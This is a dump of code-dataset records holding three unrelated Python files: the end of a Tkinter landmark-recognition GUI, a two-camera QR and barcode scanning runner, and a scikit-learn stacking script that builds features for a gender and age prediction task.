lis=='unk':\r\n\t\thasil='UNKNOWN'\r\n\t\thaha='Mohon maaf, lokasi tidak diketahui atau belum masuk pustaka sistem'\r\n\telse:\r\n\t\thasil='Benteng Vredeberg'\r\n\t\thaha=\"Benteng Vredeburg Yogyakarta terkait erat dengan lahirnya Kasultanan Yogyakarta. 
\\nPerjanjian Giyanti 13 Februari 1755 yang berrhasil menyelesaikan perseteruan \\nantara Susuhunan Pakubuwono III dengan Pangeran Mangkubumi (Sultan Hamengku Buwono I kelak)\\nadalah merupakan hasil politik Belanda yang selalu ingin \\nikut campur urusan dalam negeri raja-raja Jawa waktu itu.(sumber: Wikipedia)\"\r\n\t\r\n\treturn hasil, haha, prob\r\n\r\ndef openweb():\r\n\tchromedir= 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\r\n\tlink=maps.get(lis[0])\r\n\twebbrowser.get(chromedir).open(link)\r\n\r\ndef peking():\r\n\thasil, haha, prob=doNothing()\r\n\tlabe.configure(text=hasil) \r\n\thah.configure(text=haha)\r\n\tif prob<=0.60:\r\n\t\tprob=str(int(prob*100))+'%'\r\n\t\theh.configure(text=prob, foreground='red')\r\n\telse:\r\n\t\tprob=str(int(prob*100))+'%'\r\n\t\theh.configure(text=prob)\r\n\tconf.configure(text=\"Nilai Probabilitas: \")\r\n\r\ndef browse_file():\r\n\tglobal source\r\n\tsource = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\")\r\n\ttarget_dir = os.getcwd()\r\n\tcopy2(source, target_dir+'/'+'pict.jpg' )\r\n\tim=PhotoImage('pict.jpg')\r\n\tshowImg()\r\n\tlabe.configure(text=\" \")\t\r\n\thah.configure(text=\" \")\r\n\theh.configure(text=\" \")\r\n\tconf.configure(text=\" \")\r\n\r\ndef showImg():\r\n load = Image.open(\"pict.jpg\")\r\n x=int(load.width//300)\r\n y=int(load.height//x)\r\n image2 = load.resize((300,y), Image.ANTIALIAS)\r\n render = ImageTk.PhotoImage(image2)\r\n global img\r\n img.configure(image=render)\r\n img.image = render\r\n root.geometry(\"1050x500\")\t\r\n\r\n#***Toolbar\r\ntoolbar=Frame(root,bg='#fcba03')\r\nmedium=Frame(root)\r\n\r\ninsertButt=ttk.Button(toolbar,text='Insert Image', command=browse_file)\r\ninsertButt.pack(side=LEFT,padx=2, pady=2)\r\nsubmitButt=ttk.Button(toolbar,text='Submit', command=peking)\r\nsubmitButt.pack(side=LEFT,padx=2, pady=2)\r\nfindButt=ttk.Button(toolbar,text='Find Location', command=openweb)\r\nfindButt.pack(side=LEFT,padx=2, pady=2)\r\n\r\nlabe=ttk.Label(medium,font='Helvetica 18 bold', anchor=\"e\")\r\nlabe.grid(row = 0, column = 0, sticky = W, pady = 2)\r\nhah=ttk.Label(medium, anchor=\"e\")\r\nhah.grid(row = 1, column = 0, sticky = W, pady = 2)\r\nconf=ttk.Label(medium, anchor='e')\r\nconf.grid (row = 2, column = 0, sticky = W, pady = 2)\r\nheh=ttk.Label(medium, font='Helvetica 12 bold', anchor=\"e\")\r\nheh.grid(row = 3, column = 0, sticky = W, pady = 2)\r\n\r\nimg= ttk.Label(root)\r\nimg.place(y=120, x=80, width=300)\r\n\r\ntoolbar.grid(row = 0, sticky = W, pady = 2) \r\nmedium.grid(row = 1, column = 1, sticky = W, pady = 85, padx=200) \r\n\r\n#medium.pack(fill=X)\r\nroot.mainloop()\r\n", "sub_path": "unk_rapih.py", "file_name": "unk_rapih.py", "file_ext": "py", "file_size_in_byte": 7658, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.xfeatures2d.SIFT_create", "line_number": 73, "usage_type": "call"}, {"api_name": 
"cv2.xfeatures2d", "line_number": 73, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 110, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 126, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 126, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 127, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 137, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 140, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 141, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 141, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 151, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 153, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 153, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 155, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 158, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 160, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 160, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 162, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 162, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 164, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 164, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 167, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 167, "usage_type": "name"}]}
+{"seq_id": "202242020", "text": "\"\"\"\nГлавный файл программы.\n\nЗдесь происходит запуск и управление процессами, которые читают коды с камер,\nполучение от них данных, их синхронизация между собой и отправка запросов с финальными данными.\n\n-----\n\nНемного о задаче:\n - 2 камеры смотрят на продукцию с двух сторон\n - на продукции с одной из сторон есть QR-коды и штрих-коды и видит их только 1 камера из 2-ух\n - если с продукции прочитано кодов меньше ожидаемого числа, то нужно известить об ошибке\n - если на продукции есть коды и их нужное кол-во, то их нужно отправить серверу\n - изредка функции которые определяют, есть ли продукция на изображении, ошибаются -\n приходят данные с продукцией без кодов\n - ...\n - возможно ещё что-то, но я не помню\n\"\"\"\nimport os\nfrom multiprocessing import Queue, Process\nfrom queue import Empty\n\nfrom loguru import logger\n\nfrom .communication.signals import get_pack_codes_count, notify_bad_packdata, notify_about_packdata\nfrom .event_system.events import *\nfrom .event_system.handling import EventProcessor\nfrom .packs_processing import Interval2CamerasProcessingQueue\nfrom .video_processing import get_events_from_video\n\n\nclass CameraScannerProcess(Process):\n \"\"\"\n Процесс - обработчик событий с камеры.\n Общается с управляющим процессом через ``queue``.\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(\n target=self.task,\n args=tuple(args),\n daemon=True\n )\n\n @staticmethod\n def task(\n queue: Queue,\n worker_id: int,\n video_url: str,\n display_window: bool,\n auto_reconnect: bool,\n recognizer_args: tuple,\n ) -> None:\n \"\"\"\n Метод для запуска в отдельном процессе.\n\n Бесконечное читает QR-, штрихкоды с выбранной камеры\n и отправляет их данные базовому процессу через ``queue``.\n\n Кладёт в ``queue`` следующие события-наследники от ``CamScannerEvent``:\n\n - В случае ошибок экземпляр ``TaskError`` с информацией об ошибке.\n - В случае успешной обработки экземпляр ``CameraPackResult`` со считанными данными.\n \"\"\"\n try:\n events = get_events_from_video(\n video_url=video_url,\n display_window=display_window,\n auto_reconnect=auto_reconnect,\n recognizer_args=recognizer_args,\n )\n\n # бесконечный цикл, который получает события от камеры и кладёт их в очередь\n for event in events:\n event.worker_id = worker_id\n event.receive_time = None\n\n # отправка события основному процессу\n queue.put(event)\n except KeyboardInterrupt:\n pass\n\n\nclass RunnerWith2Cameras:\n _queue: Queue\n _processes: list[Process]\n\n def __init__(self, processes_args: list[tuple], domain_url: str):\n self._queue = Queue()\n self._sync_queue = Interval2CamerasProcessingQueue()\n self._event_processor = EventProcessor()\n self._processes = self._get_processes(processes_args)\n self._domain_url = domain_url\n self._expected_codes_count = 2\n self._iter_modcounter = 0\n\n self._init_event_processor()\n\n def _get_processes(self, processes_args) -> list[Process]:\n \"\"\"Инициализирует и возвращает процессы\"\"\"\n processes = [CameraScannerProcess(self._queue, worker_id, *args)\n for worker_id, args in enumerate(processes_args)]\n return processes\n\n def _run_processes(self) -> None:\n \"\"\"Запускает процессы\"\"\"\n for process in self._processes:\n process.start()\n\n def _kill_processes(self) -> None:\n \"\"\"Убивает процессы\"\"\"\n for process in self._processes:\n if not process.is_alive():\n continue\n process.terminate()\n process.join()\n\n def _init_event_processor(self):\n handlers = [\n self._process_camerapackresult,\n 
self._process_taskerror,\n self._process_startscanning,\n self._process_endscanning,\n self._process_packwithcodes,\n self._process_packbadcodes,\n ]\n for handler in handlers:\n self._event_processor.add_handler(handler)\n\n def _update_expected_codes_count(self) -> None:\n ITERATION_PER_REQUEST = 15\n if self._iter_modcounter != 0:\n return\n new_codes_count = get_pack_codes_count(self._domain_url)\n if new_codes_count is not None:\n self._expected_codes_count = new_codes_count\n self._iter_modcounter = (self._iter_modcounter + 1) % ITERATION_PER_REQUEST\n\n def _get_event_from_cam(self) -> Optional[CamScannerEvent]:\n QUEUE_REQUEST_TIMEOUT_SEC = 1.5\n try:\n event = self._queue.get(timeout=QUEUE_REQUEST_TIMEOUT_SEC)\n return event\n except Empty:\n return None\n\n def mainloop_with_lock(self) -> None:\n \"\"\"\n Starts the processes that handle the QR codes and barcodes from the cameras,\n and opens a blocking event loop to handle the events coming from them.\n\n Catches and logs the non-critical exceptions that reach it.\n\n Terminates on ``KeyboardInterrupt`` (Ctrl+C in the terminal)\n \"\"\"\n self._run_processes()\n\n while True:\n try:\n self._update_expected_codes_count()\n events = list(self._sync_queue.get_processed_latest())\n\n event = self._get_event_from_cam()\n if event is not None:\n events.append(event)\n\n for event in events:\n # here the events from the event list are processed\n # - the matching self._process_*Event* method is called\n self._event_processor.process_event(event)\n\n except KeyboardInterrupt as e:\n logger.info(f\"Execution interrupted {e}\")\n self._kill_processes()\n break\n except Exception as e:\n logger.exception(\"Uncaught exception\")\n logger.opt(exception=e)\n\n def _process_camerapackresult(self, event: CameraPackResult):\n msg = (f\"Received data from process #{event.worker_id}: \"\n f\"QR={event.qr_codes} \"\n f\"BAR={event.barcodes} \"\n f\"pack time='{event.start_time} - {event.finish_time}'\")\n logger.debug(msg)\n event.receive_time = datetime.now()\n event.is_paired = False\n event.expected_codes_count = self._expected_codes_count\n self._sync_queue.enqueue(event)\n\n @staticmethod\n def _process_taskerror(event: TaskError):\n event.receive_time = datetime.now()\n logger.error(f\"An error occurred in process #{event.worker_id}: \"\n f\"{event.message}\")\n\n @staticmethod\n def _process_startscanning(event: StartScanning):\n event.receive_time = datetime.now()\n logger.info(f\"Process #{event.worker_id} started scanning\")\n\n def _process_endscanning(self, event: EndScanning):\n event.receive_time = datetime.now()\n logger.info(f\"Process #{event.worker_id} finished its work\")\n\n process = self._processes[event.worker_id]\n process.terminate()\n process.join()\n\n alive_count = sum(process.is_alive() for process in self._processes)\n if alive_count == 0:\n raise KeyboardInterrupt(\"All processes have finished. 
Закрытие программы\")\n\n # noinspection PyUnusedLocal\n def _process_packbadcodes(self, event: PackBadCodes):\n notify_bad_packdata(self._domain_url)\n\n def _process_packwithcodes(self, event: PackWithCodes):\n notify_about_packdata(\n self._domain_url,\n barcodes=event.barcodes,\n qr_codes=event.qr_codes,\n )\n\n\ndef setup_logger():\n log_path = os.getenv('LOG_PATH', 'logs/2cameras.log')\n log_level = os.getenv('LOG_LEVEL', 'DEBUG')\n\n logger.add(sink=log_path, level=log_level, rotation='2 MB', compression='zip')\n\n\ndef collect_scanners_args() -> list[tuple]:\n video_urls = os.getenv('VIDEO_URLS', 'video1.mp4;video2.mp4')\n display_window = os.getenv('DISPLAY_WINDOW', '1')\n auto_reconnect = os.getenv('AUTO_RECONNECT', '1')\n\n video_urls = video_urls.split(';')\n display_window = int(display_window) != 0\n auto_reconnect = int(auto_reconnect) != 0\n\n if len(video_urls) != 2:\n message = (\"Данная программа рассчитана на 2 камеры. \"\n \"В .env через ';' ожидается ровно 2 адреса для подключения.\")\n raise ValueError(message)\n\n return [\n (\n video_url,\n display_window,\n auto_reconnect,\n tuple(),\n ) for video_url in video_urls\n ]\n\n\ndef run():\n \"\"\"\n Готовит список аргументов, логер и запускает выполнение\n событийного цикла по обработке событий процессов-сканеров.\n \"\"\"\n domain_url = os.getenv('DOMAIN_URL', 'http://localhost')\n setup_logger()\n\n # аргументы для worker_task (кроме queue и worker_id) для запуска в разных процессах\n processes_args = collect_scanners_args()\n\n try:\n runner = RunnerWith2Cameras(processes_args, domain_url)\n runner.mainloop_with_lock()\n except BaseException as e:\n logger.critical(\"Падение с критической ошибкой\")\n logger.opt(exception=e)\n raise e\n", "sub_path": "BarcodeQR_CamScanner/scan_with_2_cameras.py", "file_name": "scan_with_2_cameras.py", "file_ext": "py", "file_size_in_byte": 11149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "multiprocessing.Process", "line_number": 32, "usage_type": "name"}, {"api_name": "multiprocessing.Queue", "line_number": 47, "usage_type": "name"}, {"api_name": "video_processing.get_events_from_video", "line_number": 66, "usage_type": "call"}, {"api_name": "queue.put", "line_number": 79, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 85, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 86, "usage_type": "name"}, {"api_name": "multiprocessing.Queue", "line_number": 89, "usage_type": "call"}, {"api_name": "packs_processing.Interval2CamerasProcessingQueue", "line_number": 90, "usage_type": "call"}, {"api_name": "event_system.handling.EventProcessor", "line_number": 91, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 99, "usage_type": "name"}, {"api_name": "communication.signals.get_pack_codes_count", "line_number": 134, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 144, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 173, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 173, "usage_type": "name"}, {"api_name": "loguru.logger.exception", "line_number": 177, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 177, "usage_type": "name"}, {"api_name": "loguru.logger.opt", "line_number": 178, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 178, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 185, "usage_type": 
"call"}, {"api_name": "loguru.logger", "line_number": 185, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 194, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 194, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 200, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 200, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 204, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 204, "usage_type": "name"}, {"api_name": "communication.signals.notify_bad_packdata", "line_number": 216, "usage_type": "call"}, {"api_name": "communication.signals.notify_about_packdata", "line_number": 219, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 227, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 228, "usage_type": "call"}, {"api_name": "loguru.logger.add", "line_number": 230, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 230, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 234, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 235, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 236, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 262, "usage_type": "call"}, {"api_name": "loguru.logger.critical", "line_number": 272, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 272, "usage_type": "name"}, {"api_name": "loguru.logger.opt", "line_number": 273, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 273, "usage_type": "name"}]}
+{"seq_id": "214494213", "text": "# -*- coding:utf-8 -*-\n\nimport pandas as pd\nimport scipy.sparse\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ntrain = pd.read_csv('Demo/deviceid_train.tsv', sep='\\t', header=None)\ntest = pd.read_csv('Demo/deviceid_test.tsv', sep='\\t', header=None)\n\ndata_all = pd.concat([train, test], axis=0)\ndata_all = data_all.rename({0:'id'}, axis=1)\ndel data_all[1],data_all[2]\n\nstart_close_time = pd.read_csv('Demo/deviceid_package_start_close.tsv', sep='\\t', header=None)\nstart_close_time = start_close_time.rename({0:'id', 1:'app_name', 2:'start_time', 3:'close_time'}, axis=1)\n\nstart_close_time = start_close_time.sort_values(by='start_time')\n\nstart_close_time['start_time'] = map(int,start_close_time['start_time']/1000)\nstart_close_time['close_time'] = map(int,start_close_time['close_time']/1000)\n\nunique_app_name = np.unique(start_close_time['app_name'])\ndict_label = dict(zip(list(unique_app_name), list(np.arange(0, len(unique_app_name), 1))))\nimport time\nstart_close_time['app_name'] = start_close_time['app_name'].apply(lambda row: str(dict_label[row]))\n\ndel start_close_time['start_time'], start_close_time['close_time']\n\nfrom tqdm import tqdm, tqdm_pandas\ntqdm_pandas(tqdm())\ndef dealed_row(row):\n app_name_list = list(row['app_name'])\n return ' '.join(app_name_list)\n\ndata_feature = start_close_time.groupby('id').progress_apply(lambda row:dealed_row(row)).reset_index()\ndata_feature = pd.merge(data_all, data_feature, on='id', how='left')\ndel data_feature['id']\n\ncount_vec = CountVectorizer(ngram_range=(1,3))\ncount_csr_basic = count_vec.fit_transform(data_feature[0])\ntfidf_vec = TfidfVectorizer(ngram_range=(1,3))\ntfidf_vec_basic = tfidf_vec.fit_transform(data_feature[0])\n\ndata_feature = scipy.sparse.csr_matrix(scipy.sparse.hstack([count_csr_basic, tfidf_vec_basic]))\n\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier, PassiveAggressiveClassifier, RidgeClassifier\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.svm import LinearSVC\nfrom sklearn.cross_validation import StratifiedKFold\n\ntrain = pd.read_csv('Demo/deviceid_train.tsv', sep='\\t', header=None)\ntest = pd.read_csv('Demo/deviceid_test.tsv', sep='\\t', header=None)\ndef get_label(row):\n if row[1] == 1:\n return row[2]\n else:\n return row[2] + 11\ntrain['label'] = train.apply(lambda row:get_label(row), axis=1)\ndata_all = pd.concat([train, test], axis=0)\ndata_all = data_all.rename({0:'id'}, axis=1)\ndel data_all[1],data_all[2]\n\ntrain_feature = data_feature[:len(train)]\nscore = train['label']\ntest_feature = data_feature[len(train):]\nnumber = len(np.unique(score))\n\n# 五则交叉验证\nn_folds = 5\nprint('处理完毕')\n\n########################### lr(LogisticRegression) ################################\nprint('lr stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n clf = LogisticRegression(random_state=1017, C=8)\n clf.fit(train_feature[tr], score[tr])\n score_va = clf.predict_proba(train_feature[va])\n score_te = clf.predict_proba(test_feature)\n print('得分' + str(mean_squared_error(score[va], clf.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += 
score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_lr_2_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_lr_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('lr特征已保存\\n')\n\n########################### SGD(随机梯度下降) ################################\nprint('sgd stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n sgd = SGDClassifier(random_state=1017, loss='log')\n sgd.fit(train_feature[tr], score[tr])\n score_va = sgd.predict_proba(train_feature[va])\n score_te = sgd.predict_proba(test_feature)\n print('得分' + str(mean_squared_error(score[va], sgd.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_2_sgd_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_sgd_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('sgd特征已保存\\n')\n\n########################### pac(PassiveAggressiveClassifier) ################################\nprint('PAC stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n pac = PassiveAggressiveClassifier(random_state=1017)\n pac.fit(train_feature[tr], score[tr])\n score_va = pac._predict_proba_lr(train_feature[va])\n score_te = pac._predict_proba_lr(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], pac.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_pac_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_pac_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('pac特征已保存\\n')\n\n\n########################### ridge(RidgeClassfiy) ################################\nprint('RidgeClassfiy stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n ridge = RidgeClassifier(random_state=1017)\n ridge.fit(train_feature[tr], score[tr])\n score_va = ridge._predict_proba_lr(train_feature[va])\n score_te = ridge._predict_proba_lr(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], ridge.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_ridge_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_ridge_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('ridge特征已保存\\n')\n\n\n########################### bnb(BernoulliNB) ################################\nprint('BernoulliNB stacking')\nstack_train = np.zeros((len(train), 
number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n bnb = BernoulliNB()\n bnb.fit(train_feature[tr], score[tr])\n score_va = bnb.predict_proba(train_feature[va])\n score_te = bnb.predict_proba(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], bnb.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_bnb_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_bnb_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('BernoulliNB特征已保存\\n')\n\n########################### mnb(MultinomialNB) ################################\nprint('MultinomialNB stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n mnb = MultinomialNB()\n mnb.fit(train_feature[tr], score[tr])\n score_va = mnb.predict_proba(train_feature[va])\n score_te = mnb.predict_proba(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], mnb.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_mnb_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_mnb_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('MultinomialNB特征已保存\\n')\n", "sub_path": "性别年龄预测/top1/nb_cz_lwl_wcm/4_get_feature_device_start_close_tfidf_1_2.py", "file_name": "4_get_feature_device_start_close_tfidf_1_2.py", "file_ext": "py", "file_size_in_byte": 9008, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "tqdm.tqdm_pandas", "line_number": 32, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.csr_matrix", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 46, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 46, "usage_type": "name"}, {"api_name": "scipy.sparse.sparse.hstack", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 64, 
"usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 85, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 106, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.linear_model.PassiveAggressiveClassifier", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.linear_model.RidgeClassifier", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 165, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 176, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 179, "usage_type": 